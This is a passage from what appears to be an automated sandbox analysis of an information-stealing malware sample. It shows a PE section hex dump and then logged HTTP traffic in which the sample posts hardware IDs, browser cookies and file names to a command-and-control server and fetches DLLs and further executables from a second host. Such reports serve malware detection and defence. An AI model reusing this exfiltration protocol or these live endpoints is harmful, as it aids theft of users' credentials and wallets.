2e 74 65 78 74 00 00 00 c2 d2 00 00 00 50 00 00 00 d4 00 00 00 3c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 9d 33 00 00 00 30 01 00 00 34 00 00 00 10 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 2c 17 00 00 00 70 01 00 00 12 00 00 00 44 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 9c 0f 00 00 00 90 01 00 00 10 00 00 00 56 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
HTTP GET or POST without a user agent
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 85.28.47.31Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /5499d72b3a3e55be.php HTTP/1.1Content-Type: multipart/form-data; boundary=----AFHDAKJKFCFBGCBGDHCBHost: 85.28.47.31Content-Length: 211Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 41 46 48 44 41 4b 4a 4b 46 43 46 42 47 43 42 47 44 48 43 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 30 33 37 34 41 30 33 30 46 43 42 46 31 30 37 39 32 30 39 30 34 37 0d 0a 2d 2d 2d 2d 2d 2d 41 46 48 44 41 4b 4a 4b 46 43 46 42 47 43 42 47 44 48 43 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 73 69 6c 61 0d 0a 2d 2d 2d 2d 2d 2d 41 46 48 44 41 4b 4a 4b 46 43 46 42 47 43 42 47 44 48 43 42 2d 2d 0d 0a Data Ascii: ------AFHDAKJKFCFBGCBGDHCBContent-Disposition: form-data; name="hwid"0374A030FCBF1079209047------AFHDAKJKFCFBGCBGDHCBContent-Disposition: form-data; name="build"sila------AFHDAKJKFCFBGCBGDHCB--
Source: global traffic HTTP traffic detected: POST /5499d72b3a3e55be.php HTTP/1.1Content-Type: multipart/form-data; boundary=----KEHJKJDGCGDAKFHIDBGCHost: 85.28.47.31Content-Length: 268Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 4b 45 48 4a 4b 4a 44 47 43 47 44 41 4b 46 48 49 44 42 47 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 31 66 36 33 35 35 64 65 61 35 63 66 64 31 30 39 35 32 32 35 65 34 38 33 63 36 30 35 32 66 33 30 64 31 39 65 36 62 61 62 63 35 61 64 64 63 63 37 34 65 65 61 62 31 64 65 35 31 65 62 62 32 37 61 61 36 66 36 65 35 31 66 0d 0a 2d 2d 2d 2d 2d 2d 4b 45 48 4a 4b 4a 44 47 43 47 44 41 4b 46 48 49 44 42 47 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 62 72 6f 77 73 65 72 73 0d 0a 2d 2d 2d 2d 2d 2d 4b 45 48 4a 4b 4a 44 47 43 47 44 41 4b 46 48 49 44 42 47 43 2d 2d 0d 0a Data Ascii: ------KEHJKJDGCGDAKFHIDBGCContent-Disposition: form-data; name="token"1f6355dea5cfd1095225e483c6052f30d19e6babc5addcc74eeab1de51ebb27aa6f6e51f------KEHJKJDGCGDAKFHIDBGCContent-Disposition: form-data; name="message"browsers------KEHJKJDGCGDAKFHIDBGC--
Source: global traffic HTTP traffic detected: POST /5499d72b3a3e55be.php HTTP/1.1Content-Type: multipart/form-data; boundary=----GIEHJDHCBAEHJJJKKFIDHost: 85.28.47.31Content-Length: 267Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 47 49 45 48 4a 44 48 43 42 41 45 48 4a 4a 4a 4b 4b 46 49 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 31 66 36 33 35 35 64 65 61 35 63 66 64 31 30 39 35 32 32 35 65 34 38 33 63 36 30 35 32 66 33 30 64 31 39 65 36 62 61 62 63 35 61 64 64 63 63 37 34 65 65 61 62 31 64 65 35 31 65 62 62 32 37 61 61 36 66 36 65 35 31 66 0d 0a 2d 2d 2d 2d 2d 2d 47 49 45 48 4a 44 48 43 42 41 45 48 4a 4a 4a 4b 4b 46 49 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 70 6c 75 67 69 6e 73 0d 0a 2d 2d 2d 2d 2d 2d 47 49 45 48 4a 44 48 43 42 41 45 48 4a 4a 4a 4b 4b 46 49 44 2d 2d 0d 0a Data Ascii: ------GIEHJDHCBAEHJJJKKFIDContent-Disposition: form-data; name="token"1f6355dea5cfd1095225e483c6052f30d19e6babc5addcc74eeab1de51ebb27aa6f6e51f------GIEHJDHCBAEHJJJKKFIDContent-Disposition: form-data; name="message"plugins------GIEHJDHCBAEHJJJKKFID--
Source: global traffic HTTP traffic detected: POST /5499d72b3a3e55be.php HTTP/1.1Content-Type: multipart/form-data; boundary=----CBKJJEHCBAKFBFHJKFBKHost: 85.28.47.31Content-Length: 268Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 43 42 4b 4a 4a 45 48 43 42 41 4b 46 42 46 48 4a 4b 46 42 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 31 66 36 33 35 35 64 65 61 35 63 66 64 31 30 39 35 32 32 35 65 34 38 33 63 36 30 35 32 66 33 30 64 31 39 65 36 62 61 62 63 35 61 64 64 63 63 37 34 65 65 61 62 31 64 65 35 31 65 62 62 32 37 61 61 36 66 36 65 35 31 66 0d 0a 2d 2d 2d 2d 2d 2d 43 42 4b 4a 4a 45 48 43 42 41 4b 46 42 46 48 4a 4b 46 42 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 66 70 6c 75 67 69 6e 73 0d 0a 2d 2d 2d 2d 2d 2d 43 42 4b 4a 4a 45 48 43 42 41 4b 46 42 46 48 4a 4b 46 42 4b 2d 2d 0d 0a Data Ascii: ------CBKJJEHCBAKFBFHJKFBKContent-Disposition: form-data; name="token"1f6355dea5cfd1095225e483c6052f30d19e6babc5addcc74eeab1de51ebb27aa6f6e51f------CBKJJEHCBAKFBFHJKFBKContent-Disposition: form-data; name="message"fplugins------CBKJJEHCBAKFBFHJKFBK--
Source: global traffic HTTP traffic detected: POST /5499d72b3a3e55be.php HTTP/1.1Content-Type: multipart/form-data; boundary=----HIIIEGDBKJKEBGCBAFCFHost: 85.28.47.31Content-Length: 7291Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /8405906461a5200c/sqlite3.dll HTTP/1.1Host: 85.28.47.31Cache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /5499d72b3a3e55be.php HTTP/1.1Content-Type: multipart/form-data; boundary=----DGIJEGHDAECAKECAFCAKHost: 85.28.47.31Content-Length: 751Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 44 47 49 4a 45 47 48 44 41 45 43 41 4b 45 43 41 46 43 41 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 31 66 36 33 35 35 64 65 61 35 63 66 64 31 30 39 35 32 32 35 65 34 38 33 63 36 30 35 32 66 33 30 64 31 39 65 36 62 61 62 63 35 61 64 64 63 63 37 34 65 65 61 62 31 64 65 35 31 65 62 62 32 37 61 61 36 66 36 65 35 31 66 0d 0a 2d 2d 2d 2d 2d 2d 44 47 49 4a 45 47 48 44 41 45 43 41 4b 45 43 41 46 43 41 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 59 32 39 76 61 32 6c 6c 63 31 78 48 62 32 39 6e 62 47 55 67 51 32 68 79 62 32 31 6c 58 30 52 6c 5a 6d 46 31 62 48 51 75 64 48 68 30 0d 0a 2d 2d 2d 2d 2d 2d 44 47 49 4a 45 47 48 44 41 45 43 41 4b 45 43 41 46 43 41 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 4c 6d 64 76 62 32 64 73 5a 53 35 6a 62 32 30 4a 56 46 4a 56 52 51 6b 76 43 55 5a 42 54 46 4e 46 43 54 45 32 4f 54 6b 77 4d 54 45 32 4d 54 55 4a 4d 56 42 66 53 6b 46 53 43 54 49 77 4d 6a 4d 74 4d 54 41 74 4d 44 51 74 4d 54 4d 4b 4c 6d 64 76 62 32 64 73 5a 53 35 6a 62 32 30 4a 52 6b 46 4d 55 30 55 4a 4c 77 6c 47 51 55 78 54 52 51 6b 78 4e 7a 45 79 4d 6a 4d 77 4f 44 45 31 43 55 35 4a 52 41 6b 31 4d 54 45 39 52 57 59 31 64 6c 42 47 52 33 63 74 54 56 70 5a 62 7a 56 6f 64 32 55 74 4d 46 52 6f 51 56 5a 7a 62 47 4a 34 59 6d 31 32 5a 46 5a 61 64 32 4e 49 62 6e 46 57 65 6c 64 49 51 56 55 78 4e 48 59 31 4d 30 31 4f 4d 56 5a 32 64 33 5a 52 63 54 68 69 59 56 6c 6d 5a 7a 49 74 53 55 46 30 63 56 70 43 56 6a 56 4f 54 30 77 31 63 6e 5a 71 4d 6b 35 58 53 58 46 79 65 6a 4d 33 4e 31 56 6f 54 47 52 49 64 45 39 6e 52 53 31 30 53 6d 46 43 62 46 56 43 57 55 70 46 61 48 56 48 63 31 46 6b 63 57 35 70 4d 32 39 55 53 6d 63 77 59 6e 4a 78 64 6a 46 6b 61 6d 52 70 54 45 70 35 64 6c 52 54 56 57 68 6b 53 79 31 6a 4e 55 70 58 59 57 52 44 55 33 4e 56 54 46 42 4d 65 6d 68 54 65 43 31 47 4c 54 5a 33 54 32 63 30 43 67 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 44 47 49 4a 45 47 48 44 41 45 43 41 4b 45 43 41 46 43 41 4b 2d 2d 0d 0a Data Ascii: ------DGIJEGHDAECAKECAFCAKContent-Disposition: form-data; name="token"1f6355dea5cfd1095225e483c6052f30d19e6babc5addcc74eeab1de51ebb27aa6f6e51f------DGIJEGHDAECAKECAFCAKContent-Disposition: form-data; name="file_name"Y29va2llc1xHb29nbGUgQ2hyb21lX0RlZmF1bHQudHh0------DGIJEGHDAECAKECAFCAKContent-Disposition: form-data; name="file"Lmdvb2dsZS5jb20JVFJVRQkvCUZBTFNFCTE2OTkwMTE2MTUJMVBfSkFSCTIwMjMtMTAtMDQtMTMKLmdvb2dsZS5jb20JRkFMU0UJLwlGQUxTRQkxNzEyMjMwODE1CU5JRAk1MTE9RWY1dlBGR3ctTVpZbzVod2UtMFRoQVZzbGJ4Ym12
Source: global traffic HTTP traffic detected: POST /5499d72b3a3e55be.php HTTP/1.1Content-Type: multipart/form-data; boundary=----IEHCBAFIDAECBGCBFHJEHost: 85.28.47.31Content-Length: 363Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 49 45 48 43 42 41 46 49 44 41 45 43 42 47 43 42 46 48 4a 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 31 66 36 33 35 35 64 65 61 35 63 66 64 31 30 39 35 32 32 35 65 34 38 33 63 36 30 35 32 66 33 30 64 31 39 65 36 62 61 62 63 35 61 64 64 63 63 37 34 65 65 61 62 31 64 65 35 31 65 62 62 32 37 61 61 36 66 36 65 35 31 66 0d 0a 2d 2d 2d 2d 2d 2d 49 45 48 43 42 41 46 49 44 41 45 43 42 47 43 42 46 48 4a 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 63 32 31 71 62 47 78 74 65 57 31 73 59 6e 70 78 4c 6e 42 33 5a 41 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 49 45 48 43 42 41 46 49 44 41 45 43 42 47 43 42 46 48 4a 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d 2d 49 45 48 43 42 41 46 49 44 41 45 43 42 47 43 42 46 48 4a 45 2d 2d 0d 0a Data Ascii: ------IEHCBAFIDAECBGCBFHJEContent-Disposition: form-data; name="token"1f6355dea5cfd1095225e483c6052f30d19e6babc5addcc74eeab1de51ebb27aa6f6e51f------IEHCBAFIDAECBGCBFHJEContent-Disposition: form-data; name="file_name"c21qbGxteW1sYnpxLnB3ZA==------IEHCBAFIDAECBGCBFHJEContent-Disposition: form-data; name="file"------IEHCBAFIDAECBGCBFHJE--
Source: global traffic HTTP traffic detected: POST /5499d72b3a3e55be.php HTTP/1.1Content-Type: multipart/form-data; boundary=----KKEHIEBKJKFIEBGDGDAAHost: 85.28.47.31Content-Length: 363Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 4b 4b 45 48 49 45 42 4b 4a 4b 46 49 45 42 47 44 47 44 41 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 31 66 36 33 35 35 64 65 61 35 63 66 64 31 30 39 35 32 32 35 65 34 38 33 63 36 30 35 32 66 33 30 64 31 39 65 36 62 61 62 63 35 61 64 64 63 63 37 34 65 65 61 62 31 64 65 35 31 65 62 62 32 37 61 61 36 66 36 65 35 31 66 0d 0a 2d 2d 2d 2d 2d 2d 4b 4b 45 48 49 45 42 4b 4a 4b 46 49 45 42 47 44 47 44 41 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 63 32 31 71 62 47 78 74 65 57 31 73 59 6e 70 78 4c 6e 42 33 5a 41 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 4b 4b 45 48 49 45 42 4b 4a 4b 46 49 45 42 47 44 47 44 41 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d 2d 4b 4b 45 48 49 45 42 4b 4a 4b 46 49 45 42 47 44 47 44 41 41 2d 2d 0d 0a Data Ascii: ------KKEHIEBKJKFIEBGDGDAAContent-Disposition: form-data; name="token"1f6355dea5cfd1095225e483c6052f30d19e6babc5addcc74eeab1de51ebb27aa6f6e51f------KKEHIEBKJKFIEBGDGDAAContent-Disposition: form-data; name="file_name"c21qbGxteW1sYnpxLnB3ZA==------KKEHIEBKJKFIEBGDGDAAContent-Disposition: form-data; name="file"------KKEHIEBKJKFIEBGDGDAA--
Source: global traffic HTTP traffic detected: GET /8405906461a5200c/freebl3.dll HTTP/1.1Host: 85.28.47.31Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /8405906461a5200c/mozglue.dll HTTP/1.1Host: 85.28.47.31Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /8405906461a5200c/msvcp140.dll HTTP/1.1Host: 85.28.47.31Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /8405906461a5200c/nss3.dll HTTP/1.1Host: 85.28.47.31Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /8405906461a5200c/softokn3.dll HTTP/1.1Host: 85.28.47.31Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /8405906461a5200c/vcruntime140.dll HTTP/1.1Host: 85.28.47.31Cache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /5499d72b3a3e55be.php HTTP/1.1Content-Type: multipart/form-data; boundary=----IJDGCAEBFIIECAKFHIJEHost: 85.28.47.31Content-Length: 1067Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /5499d72b3a3e55be.php HTTP/1.1Content-Type: multipart/form-data; boundary=----IIEBGIDAAFHIJJJJEGCGHost: 85.28.47.31Content-Length: 267Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 49 49 45 42 47 49 44 41 41 46 48 49 4a 4a 4a 4a 45 47 43 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 31 66 36 33 35 35 64 65 61 35 63 66 64 31 30 39 35 32 32 35 65 34 38 33 63 36 30 35 32 66 33 30 64 31 39 65 36 62 61 62 63 35 61 64 64 63 63 37 34 65 65 61 62 31 64 65 35 31 65 62 62 32 37 61 61 36 66 36 65 35 31 66 0d 0a 2d 2d 2d 2d 2d 2d 49 49 45 42 47 49 44 41 41 46 48 49 4a 4a 4a 4a 45 47 43 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 77 61 6c 6c 65 74 73 0d 0a 2d 2d 2d 2d 2d 2d 49 49 45 42 47 49 44 41 41 46 48 49 4a 4a 4a 4a 45 47 43 47 2d 2d 0d 0a Data Ascii: ------IIEBGIDAAFHIJJJJEGCGContent-Disposition: form-data; name="token"1f6355dea5cfd1095225e483c6052f30d19e6babc5addcc74eeab1de51ebb27aa6f6e51f------IIEBGIDAAFHIJJJJEGCGContent-Disposition: form-data; name="message"wallets------IIEBGIDAAFHIJJJJEGCG--
Source: global traffic HTTP traffic detected: POST /5499d72b3a3e55be.php HTTP/1.1Content-Type: multipart/form-data; boundary=----GCAKKECAEGDGCBFIJEGHHost: 85.28.47.31Content-Length: 272Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 47 43 41 4b 4b 45 43 41 45 47 44 47 43 42 46 49 4a 45 47 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 31 66 36 33 35 35 64 65 61 35 63 66 64 31 30 39 35 32 32 35 65 34 38 33 63 36 30 35 32 66 33 30 64 31 39 65 36 62 61 62 63 35 61 64 64 63 63 37 34 65 65 61 62 31 64 65 35 31 65 62 62 32 37 61 61 36 66 36 65 35 31 66 0d 0a 2d 2d 2d 2d 2d 2d 47 43 41 4b 4b 45 43 41 45 47 44 47 43 42 46 49 4a 45 47 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 79 62 6e 63 62 68 79 6c 65 70 6d 65 0d 0a 2d 2d 2d 2d 2d 2d 47 43 41 4b 4b 45 43 41 45 47 44 47 43 42 46 49 4a 45 47 48 2d 2d 0d 0a Data Ascii: ------GCAKKECAEGDGCBFIJEGHContent-Disposition: form-data; name="token"1f6355dea5cfd1095225e483c6052f30d19e6babc5addcc74eeab1de51ebb27aa6f6e51f------GCAKKECAEGDGCBFIJEGHContent-Disposition: form-data; name="message"ybncbhylepme------GCAKKECAEGDGCBFIJEGH--
Source: global traffic HTTP traffic detected: GET /soka/random.exe HTTP/1.1Host: 185.215.113.16Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /mine/enter.exe HTTP/1.1Host: 185.215.113.16Cache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /5499d72b3a3e55be.php HTTP/1.1Content-Type: multipart/form-data; boundary=----AFCBAEBAEBFHCAKFCAKEHost: 85.28.47.31Content-Length: 363Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 41 46 43 42 41 45 42 41 45 42 46 48 43 41 4b 46 43 41 4b 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 31 66 36 33 35 35 64 65 61 35 63 66 64 31 30 39 35 32 32 35 65 34 38 33 63 36 30 35 32 66 33 30 64 31 39 65 36 62 61 62 63 35 61 64 64 63 63 37 34 65 65 61 62 31 64 65 35 31 65 62 62 32 37 61 61 36 66 36 65 35 31 66 0d 0a 2d 2d 2d 2d 2d 2d 41 46 43 42 41 45 42 41 45 42 46 48 43 41 4b 46 43 41 4b 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 63 33 52 6c 59 57 31 66 64 47 39 72 5a 57 35 7a 4c 6e 52 34 64 41 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 41 46 43 42 41 45 42 41 45 42 46 48 43 41 4b 46 43 41 4b 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d 2d 41 46 43 42 41 45 42 41 45 42 46 48 43 41 4b 46 43 41 4b 45 2d 2d 0d 0a Data Ascii: ------AFCBAEBAEBFHCAKFCAKEContent-Disposition: form-data; name="token"1f6355dea5cfd1095225e483c6052f30d19e6babc5addcc74eeab1de51ebb27aa6f6e51f------AFCBAEBAEBFHCAKFCAKEContent-Disposition: form-data; name="file_name"c3RlYW1fdG9rZW5zLnR4dA==------AFCBAEBAEBFHCAKFCAKEContent-Disposition: form-data; name="file"------AFCBAEBAEBFHCAKFCAKE--
Source: global traffic HTTP traffic detected: POST /5499d72b3a3e55be.php HTTP/1.1Content-Type: multipart/form-data; boundary=----AFCBAEBAEBFHCAKFCAKEHost: 85.28.47.31Content-Length: 363Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 41 46 43 42 41 45 42 41 45 42 46 48 43 41 4b 46 43 41 4b 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 31 66 36 33 35 35 64 65 61 35 63 66 64 31 30 39 35 32 32 35 65 34 38 33 63 36 30 35 32 66 33 30 64 31 39 65 36 62 61 62 63 35 61 64 64 63 63 37 34 65 65 61 62 31 64 65 35 31 65 62 62 32 37 61 61 36 66 36 65 35 31 66 0d 0a 2d 2d 2d 2d 2d 2d 41 46 43 42 41 45 42 41 45 42 46 48 43 41 4b 46 43 41 4b 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 63 33 52 6c 59 57 31 66 64 47 39 72 5a 57 35 7a 4c 6e 52 34 64 41 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 41 46 43 42 41 45 42 41 45 42 46 48 43 41 4b 46 43 41 4b 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d 2d 41 46 43 42 41 45 42 41 45 42 46 48 43 41 4b 46 43 41 4b 45 2d 2d 0d 0a Data Ascii: ------AFCBAEBAEBFHCAKFCAKEContent-Disposition: form-data; name="token"1f6355dea5cfd1095225e483c6052f30d19e6babc5addcc74eeab1de51ebb27aa6f6e51f------AFCBAEBAEBFHCAKFCAKEContent-Disposition: form-data; name="file_name"c3RlYW1fdG9rZW5zLnR4dA==------AFCBAEBAEBFHCAKFCAKEContent-Disposition: form-data; name="file"------AFCBAEBAEBFHCAKFCAKE--
Source: global traffic HTTP traffic detected: POST /5499d72b3a3e55be.php HTTP/1.1Content-Type: multipart/form-data; boundary=----KJKKJKEHDBGIDGDHCFHIHost: 85.28.47.31Content-Length: 265Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 4b 4a 4b 4b 4a 4b 45 48 44 42 47 49 44 47 44 48 43 46 48 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 31 66 36 33 35 35 64 65 61 35 63 66 64 31 30 39 35 32 32 35 65 34 38 33 63 36 30 35 32 66 33 30 64 31 39 65 36 62 61 62 63 35 61 64 64 63 63 37 34 65 65 61 62 31 64 65 35 31 65 62 62 32 37 61 61 36 66 36 65 35 31 66 0d 0a 2d 2d 2d 2d 2d 2d 4b 4a 4b 4b 4a 4b 45 48 44 42 47 49 44 47 44 48 43 46 48 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 66 69 6c 65 73 0d 0a 2d 2d 2d 2d 2d 2d 4b 4a 4b 4b 4a 4b 45 48 44 42 47 49 44 47 44 48 43 46 48 49 2d 2d 0d 0a Data Ascii: ------KJKKJKEHDBGIDGDHCFHIContent-Disposition: form-data; 